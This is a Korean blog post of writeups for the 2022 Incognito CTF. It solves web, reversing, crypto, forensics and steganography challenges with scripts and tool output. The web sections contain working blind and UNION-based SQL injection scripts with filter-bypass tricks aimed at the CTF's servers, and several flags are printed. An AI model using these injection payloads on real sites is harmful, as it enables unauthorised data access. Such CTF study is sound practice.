일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | 7 |
8 | 9 | 10 | 11 | 12 | 13 | 14 |
15 | 16 | 17 | 18 | 19 | 20 | 21 |
22 | 23 | 24 | 25 | 26 | 27 | 28 |
29 | 30 | 31 |
Tags
- CTF
- Gon
- 웹해킹
- KAIST
- writeup
- hacking
- reversing
- webhacking
- deayzl
- WEB
- hack
- Wargame
- TeamH4C
- cryptography
- crypto
- python
- h4cking game
- hacking game
- 워게임
- 해킹
- webhacking.kr
- ctf player
- 2022 Fall GoN Open Qual CTF
- christmas ctf
- dreamhack
- Wreckctf
- Buffer Overflow
- pwnable
- System Hacking
- got overwrite
Archives
- Today
- Total
deayzl's blog
[2022 Incognito CTF] writeups 본문
1. crawl
import requests
s = requests.Session()
counter = 1
while True:
req = requests.Request('GET', 'http://ctf.incognito.kr:9000/ctf/mailbox')
pre = s.prepare_request(req)
resp = s.send(pre)
csrf = resp.text[resp.text.find("{ \"X-CSRFToken\": '")+len("{ \"X-CSRFToken\": '"):]
csrf = csrf[:csrf.find('\'')]
req = requests.Request('POST', 'http://ctf.incognito.kr:9000/ctf/mailbox/mail_detail')
pre = s.prepare_request(req)
pre.headers['X-CSRFToken'] = csrf
pre.headers['X-Requested-With'] = 'XMLHttpRequest'
pre.headers['Referer'] = 'http://ctf.incognito.kr:9000/ctf/mailbox'
pre.headers['Pragma'] = 'no-cache'
pre.headers['Origin'] = 'http://ctf.incognito.kr:9000'
pre.headers['Host'] = 'ctf.incognito.kr:9000'
pre.headers['Content-Type'] = 'application/x-www-form-urlencoded; charset=UTF-8'
pre.headers['Connection'] = 'keep-alive'
pre.headers['Cache-Control'] = 'no-cache'
pre.headers['Accept'] = 'application/json, text/javascript, */*; q=0.01'
pre.headers['Accept-Encoding'] = 'gzip, deflate'
pre.headers['Accept-Language'] = 'ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7'
pre.headers['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36'
pre.headers['Content-Length'] = str(len(f'"{counter}_show"'))
pre.body = f'"{counter}_show"'
resp = s.send(pre)
print(resp.text)
if 'INCO{' in resp.text and resp.text[len(resp.text)-1-2] == '}':
print('got it!!')
break
counter += 1
#INCO{It_1s_F1Ag_tHank_yOu3}
2. login
web 문제 중 blacklist filter 가 있는 경우, 대문자를 끼워넣거나 %0a 를 사용하는 방식으로 우회할 수 있다.
그리고 table, column 의 이름은 information_schema, sqli 의 경우 sqlite_master 에서 알 수 있다.
import requests
import time
#table: member ADMINISTRABLE_ROLE_AUTHO)IZATIO7S INNODB_TABLESPACES
#member
#column: name pw num
counter = 0
while True:
start_time = time.time()
req = requests.get(f'http://ctf.incognito.kr:58888/index.php?id=%27|if((Select%0aLeNgth(pw)<{counter}%0afrom%0amember),sleep(3),0)=%271&pw=asdf')
end_time = time.time()
#print(end_time - start_time)
if end_time - start_time > 2:
counter -= 1
break
counter += 1
_len = counter
print(_len)
_name = ''
for i in range(_len):
counter = 33
while True:
start_time = time.time()
req = requests.get(f'http://ctf.incognito.kr:58888/index.php?id=%27|if((Select%0aaScii(suBsTring(pw,{i+1},1))={counter}%0afrom%0amember),sleep(3),0)=%271&pw=asdf')
end_time = time.time()
#print(end_time - start_time)
if end_time - start_time > 2:
#counter -= 1
_name += chr(counter)
print('Hit!, ', _name)
break
counter += 1
print(_name)
#VAPB{U3110!o1vaq_4qz1a!!} -> rot13 13 ->
#INCO{H3110!b1ind_4dm1n!!}
3. admin
여기는 select 의 사용이 불가능하기에 column 의 이름을 추측해야 하고,
time based sql injection 으로 YWRtaW5z (admins) 계정의 학번을 알아내야 한다.
그 계정으로 "비밀번호 찾기" 를 누르면, flag 의 base64 값이 나온다.
import requests
import time
import string
num = ''
counter = 1
while True:
bFound = False
for i in string.digits:
start_time = time.time()
req = requests.get(f'http://ctf.incognito.kr:48888/index.php?name=asdf%5C&num=%0aor%0aif(name%0alike%0a\'YWRtaW5z\'%0aand%0anum%0alike%0a\''+num+i+'%25\',sleep(3),False)%0aor%0a%27')
end_time = time.time()
print(end_time - start_time)
if end_time - start_time > 2:
num += i
print('Hit!, ', num)
bFound = True
break
if not bFound:
break
counter += 1
print(num)
#YWRtaW5z 19383746 -> SU5DT3tCNDUzNjRfMTVfNW9fMzQ1eSEhIX0= -> INCO{B45364_15_5o_345y!!!}
4. chatting
여러 테이블 중 auth_user 의 first_name 을 보면 flag 를 얻을 수 있다.
CREATE TABLE "django_migrations" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "app" varchar(255) NOT NULL, "name" varchar(255) NOT NULL, "applied" datetime NOT NULL)
CREATE TABLE sqlite_sequence(name,seq)
CREATE TABLE "auth_group_permissions" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "group_id" integer NOT NULL REFERENCES "auth_group" ("id") DEFERRABLE INITIALLY DEFERRED, "permission_id" integer NOT NULL REFERENCES "auth_permission" ("id") DEFERRABLE INITIALLY DEFERRED)
CREATE TABLE "auth_user_groups" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "group_id" integer NOT NULL REFERENCES "auth_group" ("id") DEFERRABLE INITIALLY DEFERRED)
CREATE TABLE "auth_user_user_permissions" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "permission_id" integer NOT NULL REFERENCES "auth_permission" ("id") DEFERRABLE INITIALLY DEFERRED)
CREATE UNIQUE INDEX "auth_group_permissions_group_id_permission_id_0cd325b0_uniq" ON "auth_group_permissions" ("group_id", "permission_id")
CREATE INDEX "auth_group_permissions_group_id_b120cbf9" ON "auth_group_permissions" ("group_id")
CREATE INDEX "auth_group_permissions_permission_id_84c5c92e" ON "auth_group_permissions" ("permission_id")
CREATE UNIQUE INDEX "auth_user_groups_user_id_group_id_94350c0c_uniq" ON "auth_user_groups" ("user_id", "group_id")
CREATE INDEX "auth_user_groups_user_id_6a12ed8b" ON "auth_user_groups" ("user_id")
CREATE INDEX "auth_user_groups_group_id_97559544" ON "auth_user_groups" ("group_id")
CREATE TABLE "django_admin_log" ("id" integer NOT NULL PRIMARY KEY AUTOINCREMENT, "object_id" text NULL, "object_repr" varchar(200) NOT NULL, "action_flag" smallint unsigned NOT NULL CHECK ("action_flag" >= 0), "change_message" text NOT NULL, "content_type_id" integer NULL REFERENCES "django_content_type" ("id") DEFERRABLE INITIALLY DEFERRED, "user_id" integer NOT NULL REFERENCES "auth_user" ("id") DEFERRABLE INITIALLY DEFERRED, "action_time" datetime NOT NULL)
...
import requests
req = requests.get(f'http://ctf.incognito.kr:8877/?search=%27%20union%20select%20first_name,%20first_name%20from%20auth_user--%20')
flag = req.text[req.text.find('INCO{'):]
flag = flag[:flag.find('}')+1]
print(flag)
#INCO{5ql_1NjEc71on}
5. DoNotDebug
IsDebuggerPresent 와 같은 안티 디버깅 기법들을 제거하는 패치를 해주면 손쉽게 flag 를 얻을 수 있다.
6. Stack Machine
vm 파일의 instruction 을 해석하고 난 후, z3 로 풀면 끝.
from pwn import *
vm_raw = b''
with open('vm', 'rb') as f:
while True:
tmp = f.read(1024)
if len(tmp) == 0:
break
else:
vm_raw += tmp
vm_len = u16(vm_raw[:2])
vm = vm_raw[2:vm_len+2]
c = [0 for i in range(700)]
print('j == -1')
j = -1
i = 0
while i < vm_len:
content = vm[i]
i += 1
if content == 219:
j += 1
print(f'c[{j}] = getchar()')
elif content == 213:
i += 8
print(f'c[{j}] != 0 then i += 8+{u64(vm[i:i+8])}')
j -= 1
elif content == 202:
print(f'c[{j-1}] ^= c[{j}]')
j -= 1
elif content == 184:
print(f'c[{j-1}] += c[{j}]')
j -= 1
elif content == 161:
print(f'exit({u64(vm[i:i+8])})')
exit()
elif content == 54:
print(f'putchar(c[{j}])')
j -= 1
elif content == 41:
j += 1
print(f'c[{j}] = {u64(vm[i:i+8])}')
i += 8
elif content == 48:
print(f'c[{j-1}] = (c[{j}] != c[{j-1}])')
j -= 1
else:
assert False
from z3 import *
inp = []
c = [0 for i in range(100)]
s = Solver()
def getchar():
tmp = BitVec('inp[%d]'%len(inp), 8)
inp.append(tmp)
return tmp
c[0] = 9932684790403988281
c[1] = 3981783414261391299
c[2] = 18128899290963801448
c[3] = 7499717806347970135
c[4] = 5425025371572045960
c[5] = getchar()
c[4] += c[5]
c[3] ^= c[4]
c[2] ^= c[3]
c[1] += c[2]
c[0] ^= c[1]
c[1] = 6326606491199503735
c[2] = 11727609654421141602
c[3] = 13333360695465845293
c[4] = 15936386119677961440
c[5] = getchar()
c[4] += c[5]
c[3] ^= c[4]
c[2] ^= c[3]
c[1] ^= c[2]
c[2] = 13013207156595470061
c[3] = 1444156656146803533
c[4] = 6835624496029438678
c[5] = getchar()
c[4] ^= c[5]
c[3] += c[4]
c[2] ^= c[3]
c[3] = 9473197671008895425
c[4] = 16390026795440292412
c[5] = 8618855848416941065
c[6] = getchar()
c[5] += c[6]
c[4] ^= c[5]
c[3] += c[4]
c[4] = 6024961974338290886
c[5] = 8810359034158194075
c[6] = 14469683107865870911
c[7] = 16039933917641716108
c[8] = 12640120913447022199
c[9] = getchar()
c[8] ^= c[9]
c[7] += c[8]
c[6] += c[7]
c[5] ^= c[6]
c[4] += c[5]
c[5] = 5193290494856744947
c[6] = 10690958200367824705
c[7] = 4868948814662615861
c[8] = 683964415960939350
c[9] = 4163681683479634048
c[10] = 12168753866435275347
c[11] = 12146127191315940638
c[12] = getchar()
c[11] ^= c[12]
c[10] += c[11]
c[9] ^= c[10]
c[8] ^= c[9]
c[7] += c[8]
c[6] += c[7]
c[5] += c[6]
c[6] = 3476564392780481757
c[7] = 2006874671871151415
c[8] = 12824197427929327444
c[9] = 12083025626049681937
c[10] = 16008583071417006553
c[11] = 3503452712029565141
c[12] = 4687048395109227849
c[13] = 16854047988139109216
c[14] = 13756878276426990950
c[15] = getchar()
c[14] ^= c[15]
c[13] ^= c[14]
c[12] ^= c[13]
c[11] ^= c[12]
c[10] += c[11]
c[9] += c[10]
c[8] ^= c[9]
c[7] ^= c[8]
c[6] += c[7]
c[7] = 7028037281966016268
c[8] = 14165122113651211877
c[9] = 5392392772250547940
c[10] = 3311842680646068432
c[11] = getchar()
c[10] ^= c[11]
c[9] += c[10]
c[8] += c[9]
c[7] += c[8]
c[8] = 9258641333616248163
c[9] = 13646422201855178699
c[10] = 17244770065079177130
c[11] = getchar()
c[10] += c[11]
c[9] += c[10]
c[8] += c[9]
c[9] = 11263758573414315722
c[10] = 2291098985055159465
c[11] = 17736300515739104956
c[12] = 9225658490194612832
c[13] = getchar()
c[12] += c[13]
c[11] += c[12]
c[10] += c[11]
c[9] ^= c[10]
c[10] = 10725323274089116828
c[11] = 6647285194965883625
c[12] = 10033362048030486878
c[13] = 8536304132617548188
c[14] = 6486727104292397225
c[15] = getchar()
c[14] += c[15]
c[13] ^= c[14]
c[12] += c[13]
c[11] += c[12]
c[10] ^= c[11]
c[11] = 10031450704042083898
c[12] = 15064108163919261094
c[13] = 6566164850047027542
c[14] = 3579091316087062654
c[15] = getchar()
c[14] += c[15]
c[13] ^= c[14]
c[12] ^= c[13]
c[11] += c[12]
c[12] = 698354924443006014
c[13] = 15280877972506416330
c[14] = 15577458196294027228
c[15] = getchar()
c[14] += c[15]
c[13] += c[14]
c[12] += c[13]
c[13] = 2498670747640652309
c[14] = 9524402598716321551
c[15] = 18044044835724495664
c[16] = 6213568967391424121
c[17] = 3147938522393136546
c[18] = 1730165799852629577
c[19] = 6408097110053457446
c[20] = 6196815601815273338
c[21] = 270944429482767874
c[22] = getchar()
c[21] += c[22]
c[20] += c[21]
c[19] ^= c[20]
c[18] += c[19]
c[17] += c[18]
c[16] ^= c[17]
c[15] += c[16]
c[14] += c[15]
c[13] += c[14]
c[14] = 4918898107041287428
c[15] = 18175739274470711949
c[16] = 14421442322560697809
c[17] = getchar()
c[16] ^= c[17]
c[15] += c[16]
c[14] += c[15]
c[15] = 8018804925798494415
c[16] = 6710318530716452507
c[17] = 16126219073666357108
c[18] = 14081309027816664652
c[19] = 16733055164831549011
c[20] = 7157954037798845337
c[21] = getchar()
c[20] += c[21]
c[19] ^= c[20]
c[18] ^= c[19]
c[17] += c[18]
c[16] ^= c[17]
c[15] += c[16]
c[16] = 15503965566483097647
c[17] = 4996101922589672156
c[18] = 5833521358458912777
c[19] = 2723680459370559844
c[20] = 2328313581554868504
c[21] = 1357365813224912539
c[22] = 14696593702283082662
c[23] = getchar()
c[22] += c[23]
c[21] ^= c[22]
c[20] ^= c[21]
c[19] += c[20]
c[18] ^= c[19]
c[17] += c[18]
c[16] ^= c[17]
c[17] = 13718262097243472683
c[18] = 3323983633866858589
c[19] = 10119337698916987669
c[20] = 1136020430667426008
c[21] = getchar()
c[20] ^= c[21]
c[19] ^= c[20]
c[18] += c[19]
c[17] ^= c[18]
c[18] = 4498241019005291386
c[19] = 10430024839406056567
c[20] = 11081984034916842939
c[21] = 2377861015981010747
c[22] = 8140368618305448802
c[23] = 11818413254717561094
c[24] = 7064401558039292889
c[25] = 12505631402569488455
c[26] = getchar()
c[25] += c[26]
c[24] += c[25]
c[23] += c[24]
c[22] += c[23]
c[21] += c[22]
c[20] += c[21]
c[19] += c[20]
c[18] ^= c[19]
c[19] = 12426720606117189214
c[20] = 14972901593259487129
c[21] = 8543482851339982473
c[22] = getchar()
c[21] += c[22]
c[20] ^= c[21]
c[19] += c[20]
c[20] = 1629889153707539478
c[21] = 17341177077300957439
c[22] = 6078944653200992161
c[23] = 10566666523869213247
c[24] = 7263284840378083349
c[25] = 17584022320925044751
c[26] = 8692105150239555357
c[27] = 315833979318776616
c[28] = 6269493266600410358
c[29] = getchar()
c[28] ^= c[29]
c[27] ^= c[28]
c[26] += c[27]
c[25] ^= c[26]
c[24] += c[25]
c[23] ^= c[24]
c[22] += c[23]
c[21] ^= c[22]
c[20] += c[21]
c[21] = 1928151548783765996
c[22] = 9136913200161131206
c[23] = 9558448254955062399
c[24] = 9043200431716271294
c[25] = 7522359116772730195
c[26] = getchar()
c[25] ^= c[26]
c[24] += c[25]
c[23] ^= c[24]
c[22] ^= c[23]
c[21] += c[22]
c[22] = 9912258405660383033
c[23] = 6050409919930564764
c[24] = 772317344628148685
c[25] = 11746303378648469064
c[26] = getchar()
c[25] ^= c[26]
c[24] += c[25]
c[23] += c[24]
c[22] ^= c[23]
c[23] = 18139491710616570868
c[24] = 9346305025277215902
c[25] = 835069692985696380
c[26] = 1773732121093517278
c[27] = 105682633695814624
c[28] = 8210763851348992640
c[29] = 1113714189784085863
c[30] = 5476748382071574810
c[31] = getchar()
c[30] ^= c[31]
c[29] ^= c[30]
c[28] += c[29]
c[27] += c[28]
c[26] += c[27]
c[25] ^= c[26]
c[24] += c[25]
c[23] += c[24]
c[24] = 4433023941960474278
c[25] = 14112970271161702627
c[26] = 14453461473651973526
c[27] = 11710389551995994491
c[28] = getchar()
c[27] ^= c[28]
c[26] ^= c[27]
c[25] += c[26]
c[24] += c[25]
c[25] = 10631904080342836610
c[26] = 13189193739346557134
c[27] = 8869784457484967284
c[28] = 12194173170689449781
c[29] = getchar()
c[28] += c[29]
c[27] += c[28]
c[26] += c[27]
c[25] += c[26]
c[26] = 15915053349214019189
c[27] = 11521767751078383438
c[28] = 14533552431219244418
c[29] = 14300881089460759252
c[30] = 9040285580144197694
c[31] = 10257692247147470437
c[32] = 14192837257263753759
c[33] = 2735605769679131093
c[34] = getchar()
c[33] += c[34]
c[32] ^= c[33]
c[31] += c[32]
c[30] ^= c[31]
c[29] += c[30]
c[28] ^= c[29]
c[27] ^= c[28]
c[26] ^= c[27]
c[27] = 13646125251590784611
c[28] = 2350223036634077455
c[29] = 5333532857677095192
c[30] = getchar()
c[29] ^= c[30]
c[28] += c[29]
c[27] ^= c[28]
c[28] = 10718192012270129589
c[29] = 123785428779133261
c[30] = 1115427221566365663
c[31] = 13858125889399502454
c[32] = 15421756623045370081
c[33] = 10625431853482940446
c[34] = 2858922243027052087
c[35] = getchar()
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] += c[32]
c[30] ^= c[31]
c[29] += c[30]
c[28] ^= c[29]
c[29] = 4193907992175213577
c[30] = 170664819355138875
c[31] = 9846060713415560061
c[32] = 10008376725607836570
c[33] = 6500742485917708152
c[34] = 3703571390196563300
c[35] = getchar()
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] ^= c[32]
c[30] ^= c[31]
c[29] ^= c[30]
c[30] = 16068289189730100280
c[31] = 15983412130463586929
c[32] = 6101489928213793106
c[33] = 15632864178300331681
c[34] = 13550763660520404178
c[35] = 1631272113114106589
c[36] = 3288050860235592420
c[37] = 1790832365339697305
c[38] = 4237654194595834826
c[39] = getchar()
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[35] += c[36]
c[34] += c[35]
c[33] += c[34]
c[32] += c[33]
c[31] += c[32]
c[30] += c[31]
c[31] = 1399164207473144990
c[32] = 15677047834318502945
c[33] = 7507893918949420867
c[34] = 14174128410387719963
c[35] = 11736459515879490328
c[36] = 11055886264332921041
c[37] = 9004881701944248172
c[38] = 17459828991442561468
c[39] = 12657901952147185249
c[40] = getchar()
c[39] ^= c[40]
c[38] += c[39]
c[37] ^= c[38]
c[36] += c[37]
c[35] += c[36]
c[34] += c[35]
c[33] ^= c[34]
c[32] ^= c[33]
c[31] ^= c[32]
c[32] = 11542163322951764181
c[33] = 13556695670265251290
c[34] = 8896178454740675680
c[35] = 9714994894358830132
c[36] = 4415780584005132632
c[37] = 12574376580664805321
c[38] = 2705749237807390307
c[39] = getchar()
c[38] ^= c[39]
c[37] ^= c[38]
c[36] += c[37]
c[35] ^= c[36]
c[34] += c[35]
c[33] ^= c[34]
c[32] += c[33]
c[33] = 2062725140253809310
c[34] = 1545706997601201613
c[35] = 16466472025074215596
c[36] = 13910973756042749477
c[37] = getchar()
c[36] += c[37]
c[35] ^= c[36]
c[34] += c[35]
c[33] += c[34]
c[34] = 15313922134322430163
c[35] = 5554890310739120801
c[36] = 10023476581573828743
c[37] = 9119145857545001130
c[38] = 4054077477321909583
c[39] = 12407098630961990094
c[40] = getchar()
c[39] += c[40]
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[35] += c[36]
c[34] ^= c[35]
c[35] = 1350795824549080488
c[36] = 6009822791611617285
c[37] = 8119372895504244127
c[38] = 2251446627786121745
c[39] = getchar()
c[38] += c[39]
c[37] += c[38]
c[36] ^= c[37]
c[35] ^= c[36]
c[36] = 15362678556740064341
c[37] = 10316159694986214414
c[38] = 3591983768360169475
c[39] = 14938784382612384621
c[40] = 11339084893309025514
c[41] = 12205994744993947123
c[42] = 17433327879405071452
c[43] = 5816977475588028627
c[44] = 16136773507488350822
c[45] = getchar()
c[44] += c[45]
c[43] ^= c[44]
c[42] += c[43]
c[41] += c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] += c[39]
c[37] += c[38]
c[36] += c[37]
c[37] = 14016925425405076414
c[38] = 6267620817628946003
c[39] = 16430625412469031478
c[40] = 88182008894387362
c[41] = 8709429871187949033
c[42] = 10589748356343871522
c[43] = 5064334248483087925
c[44] = 7426804913387014566
c[45] = 10865171643927062589
c[46] = getchar()
c[45] += c[46]
c[44] += c[45]
c[43] ^= c[44]
c[42] ^= c[43]
c[41] ^= c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] += c[39]
c[37] ^= c[38]
c[38] = 16763221103862173059
c[39] = 13422886181026844195
c[40] = 1631568059986288660
c[41] = 5215276383434159904
c[42] = 599997451257354427
c[43] = 16090446934827825033
c[44] = 5698261134564167716
c[45] = 14703224673005718394
c[46] = 16483544490155560671
c[47] = getchar()
c[46] += c[47]
c[45] ^= c[46]
c[44] ^= c[45]
c[43] += c[44]
c[42] += c[43]
c[41] += c[42]
c[40] ^= c[41]
c[39] += c[40]
c[38] ^= c[39]
c[39] = 5514693649090898598
c[40] = 5675775170157984441
c[41] = 14125598251763666359
c[42] = 18170077620203995512
c[43] = 19592580633248516
c[44] = 13683458113123837196
c[45] = getchar()
c[44] ^= c[45]
c[43] ^= c[44]
c[42] += c[43]
c[41] ^= c[42]
c[40] ^= c[41]
c[39] ^= c[40]
c[40] = 3131572931438933272
c[41] = 10714943557282477766
c[42] = 5484270251250118157
c[43] = 7822281286051639469
c[44] = 217496263967125951
c[45] = 7383182598747815858
c[46] = getchar()
c[45] ^= c[46]
c[44] ^= c[45]
c[43] += c[44]
c[42] ^= c[43]
c[41] += c[42]
c[40] += c[41]
c[41] = 11073291388929666744
c[42] = 12556045251181411187
c[43] = 17202987169272959651
c[44] = 3498233194846432736
c[45] = 9811028171250343540
c[46] = 15447895449397085620
c[47] = getchar()
c[46] ^= c[47]
c[45] += c[46]
c[44] += c[45]
c[43] ^= c[44]
c[42] ^= c[43]
c[41] += c[42]
c[42] = 18311754622359156630
c[43] = 15594695003269406222
c[44] = 14863770709621722151
c[45] = 1995415076881473459
c[46] = 11624903732590886947
c[47] = getchar()
c[46] += c[47]
c[45] += c[46]
c[44] ^= c[45]
c[43] ^= c[44]
c[42] += c[43]
c[43] = 11997434615315793955
c[44] = 15206057853866387321
c[45] = 11758249108697471326
c[46] = 5159877175902714817
c[47] = 11990864672144733375
c[48] = 16654263466120501907
c[49] = getchar()
c[48] += c[49]
c[47] += c[48]
c[46] ^= c[47]
c[45] ^= c[46]
c[44] += c[45]
c[43] ^= c[44]
c[44] = 14901411196071314281
c[45] = 16947858051347698953
c[46] = 11966293193572801808
c[47] = getchar()
c[46] += c[47]
c[45] ^= c[46]
c[44] += c[45]
c[45] = 17205182659947320959
c[46] = 7134039153444132965
c[47] = 1106747787369745867
c[48] = 8187918296814335425
c[49] = 15956329184180189402
c[50] = 4384353541114149762
c[51] = 2675631644319678684
c[52] = 2847463810049019273
c[53] = 12182251566179445109
c[54] = getchar()
c[53] += c[54]
c[52] += c[53]
c[51] ^= c[52]
c[50] ^= c[51]
c[49] += c[50]
c[48] += c[49]
c[47] ^= c[48]
c[46] ^= c[47]
c[45] ^= c[46]
j = 0
res = [11160101089126054161, 2012728469017988072, 11117105121394465975, 12198350148471122344, 7607965874239596224, 6793088470981622980,
9191418319461399064, 15232517486787036234, 5261740622873570926, 2111042004194075722, 14858885011757777482, 17272697075264961523,
6313158162450257254, 1588658321132036046, 8991448573755356202, 4497652325675240907, 6016728178720961850, 13453796986756982161,
15547245991394917615, 5920391660159577516, 7991567300444707631, 7743736540782924899, 4781932715221502857, 9817029683742592938,
4201915802787942712, 12177332710199634000, 7336213525980958596, 5652188919652622626, 1130153536024248183, 4759154887302418413,
16866370082191875729, 622591556653593921, 12982067723104642403, 13109947019533898011, 5112040232137058942, 9739034644397517078,
695619218990020835, 3256345453131500815, 11450650774804292870, 3932877630134846168, 9357541319859029781, 9237722673203544338,
1756632871624628261, 14303295942802133775, 10460946694704824854, 11086382675458244744]
for i in range(45, -1, -1):
s.add(c[i] == res[45-i])
print(s.check())
md = s.model()
print(md)
for i in inp:
print(chr(md[i].as_long()),end='')
#INCO{94a7d6671aab2c62db0760e639c5217781030e2f}
7. NAND
import gdb
idx = 0
bf_idx = 0
charset_range = [int(i, 16) for i in '''0x555555401e20: 0x37 0x6e 0x6b 0x75 0x34 0x67 0x30 0x73
0x555555401e28: 0x62 0x39 0x31 0x6c 0x6f 0x38 0x5f 0x63
0x555555401e30: 0x76 0x69 0x6d 0x79 0x33 0x78 0x65 0x70
0x555555401e38: 0x72 0x68 0x66 0x36 0x7a 0x74 0x35 0x61
0x555555401e40: 0x64 0x32 0x77 0x71 0x6a'''.split() if '0x5555' not in i]
flag = [charset_range[0] for i in range(40)]
flag.append(0)
gdb.execute('file NAND')
gdb.execute('aslr off')
hell_list = [0xE31, 0xE8B, 0xEF4, 0xF61, 0xFD3, 0x101E, 0x1087, 0x10F4, 0x1157, 0x11C0, 0x121A, 0x1296, 0x1308, 0x1371, 0x13BC, 0x141A, 0x147D, 0x14C8, 0x1531, 0x158F, 0x15F2, 0x164C, 0x16B5, 0x1722, 0x1785, 0x17DF, 0x1857, 0x18B5, 0x1927, 0x1990, 0x19DB, 0x1A2A, 0x1A8D, 0x1AD8, 0x1B41, 0x1B90, 0x1BE4, 0x1C20, 0x1C6B, 0x1CD8]
for i in range(len(hell_list)):
hell_list[i] += 0x555555400000
gdb.execute(f'b *{hex(hell_list[i])}')
goal = 0x1CF7+0x555555400000
gdb.execute('b *0xD51+0x555555400000')
gdb.execute('b *0xDBE+0x555555400000')
gdb.execute(f'b *{hex(goal)}')
gdb.execute('b *0xCA5+0x555555400000')
while True:
gdb.execute('r <<< \'A\'')
gdb.execute('ni')
for i in range(len(flag)):
gdb.execute(f'set *((char*)$rbp-0x60+{i})={hex(flag[i])}')
gdb.execute('c')
present_bp = int(gdb.execute('x/xg $rip', to_string=True).split(':\t')[0], 16)
print(hex(present_bp), hex(hell_list[idx]))
if present_bp == hell_list[idx]:
bf_idx += 1
flag[idx] = charset_range[bf_idx]
print(idx, flag[idx])
elif present_bp in hell_list[idx+1:]:
print('hit!, ', bytes(flag))
idx += 1
bf_idx = 0
elif present_bp == goal:
gdb.execute('c')
break
else:
assert False
#INCO{y34h_3v3ry_op3ra7ion_w1th_on1y_nand_0v0_}
8. I’M FINE THANK YOU, AND U?
Lxwpajcdujcrxwb! Mabl ehhdl ebdx t jnbmx lbfiex vbiaxk. Vjhkn hxd'en wxcrlnm fqjc cqrb rb jc j pujwln. Ahpxoxk, mabl bl ghm matm yetz rhn'kx ehhdbgz yhk. Rc'b sdbc j urccun qrwc. Matm'l tee. Bx, wxf hxd twxf fqjc cx mx? GNIEEWYs0cpat3anahh1n1lsh0dlp3ahh1n3i1vp3d
rot ->
Sedwhqjkbqjyedi! This looks like a quite simple cipher. Cqoru oek'lu dejysut mxqj jxyi yi qj q wbqdsu. However, this is not that flag you're looking for. Yj'i zkij q byjjbu xydj. That's all. Ie, dem oek adem mxqj je te? NUPLLDFz0jwha3huhoo1u1szo0ksw3hoo1u3p1cw3k
NUPLLDFz0jwha3huhoo1u1szo0ksw3hoo1u3p1cw3k
Affine Cipher ->
INCOOMGy0uhav3anaff1n1tyf0rth3aff1n3c1ph3r
guess ->
INCO{OMG_y0u_hav3_an_aff1n1ty_f0r_th3_aff1n3_c1ph3r}
9. Bondee
extract PDF from image
inside PDF:
X Pos Y Pos Text
85,03 733,36 직접 관리하고 추후에 사용자들로 하여금 잔액을 되찾아가게 하였다. 이로 인해 IOTA 재단의
85,03 717,42 신뢰성마저도 추락한 사건이었다.
85,03 685,41 IOTA 팀에 따르면 Curl hahser라는 하드웨어 장치가 있어야만 IOTA 거래를 생성하기 위해
85,03 669,47 필요한 작업증명을 수행할 수 있다고 한다.
85,03 621,52 방향성 비사이클 그래프(DAG) 아키텍처 자체는
85,03 605,46 흥미롭고 새로운 방식으로 분산 장부를 만드는 메커니즘이다.
85,03 589,51 DAG가
...
85,03 285,89 number_list
148,72 285,89 = [73, 78,
203,77 285,89 67,
223,92 285,89 79, 123,
269,85 285,89 105,
295,52 285,89 110, 99,
341,46 285,89 111,
367,12 285,89 95, 115,
413,06 285,89 119,
438,72 285,89 108, 117,
490,17 285,89 103,
85,03 269,82 95, 50, 48, 50, 51, 125]
85,03 253,88 text_list = []
85,03 221,88 for i in range(len(number_list)):
85,03 189,99 text_list.append(chr(number_list[i]))
85,03 142,04 str = ''.join(text_list)
85,03 110,04 print("Flag= " + str)
number_list \
= [73, 78, \
67, \
79, 123, \
105, \
110, 99, \
111, \
95, 115, \
119, \
108, 117, \
103, \
95, 50, 48, 50, 51, 125]
text_list = []
for i in range(len(number_list)):
text_list.append(chr(number_list[i]))
str = ''.join(text_list)
print("Flag= " + str)#Flag= INCO{inco_swlug_2023}
10. WOW
Volatility Foundation Volatility Framework 2.6.1
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win10x64_10240_17770, Win10x64
AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
AS Layer2 : FileAddressSpace (/home/kali/Downloads/ctf/incognito/wow/WOW.vmem)
PAE type : No PAE
DTB : 0x1ab000L
KDBG : 0xf803f538cb20L
Number of Processors : 1
Image Type (Service Pack) : 0
KPCR for CPU 0 : 0xfffff803f53e6000L
KUSER_SHARED_DATA : 0xfffff78000000000L
Image date and time : 2023-03-03 08:57:20 UTC+0000
Image local date and time : 2023-03-03 17:57:20 +0900
python2 vol.py -f /home/kali/Downloads/ctf/incognito/wow/WOW.vmem --profile=Win10x64_10240_17770 pslist
Volatility Foundation Volatility Framework 2.6.1
Offset(V) Name PID PPID Thds Hnds Sess Wow64 Start Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe001dc265840 System 4 0 185 0 ------ 0 2023-03-03 08:49:55 UTC+0000
0xffffe001dd977040 smss.exe 476 4 2 0 ------ 0 2023-03-03 08:49:55 UTC+0000
0xffffe001ddb56080 csrss.exe 568 560 8 0 0 0 2023-03-03 08:49:59 UTC+0000
0xffffe001ddd6f080 wininit.exe 628 560 1 0 0 0 2023-03-03 08:50:00 UTC+0000
0xffffe001ddd74080 csrss.exe 636 620 11 0 1 0 2023-03-03 08:50:00 UTC+0000
0xffffe001ddd9b080 winlogon.exe 672 620 2 0 1 0 2023-03-03 08:50:00 UTC+0000
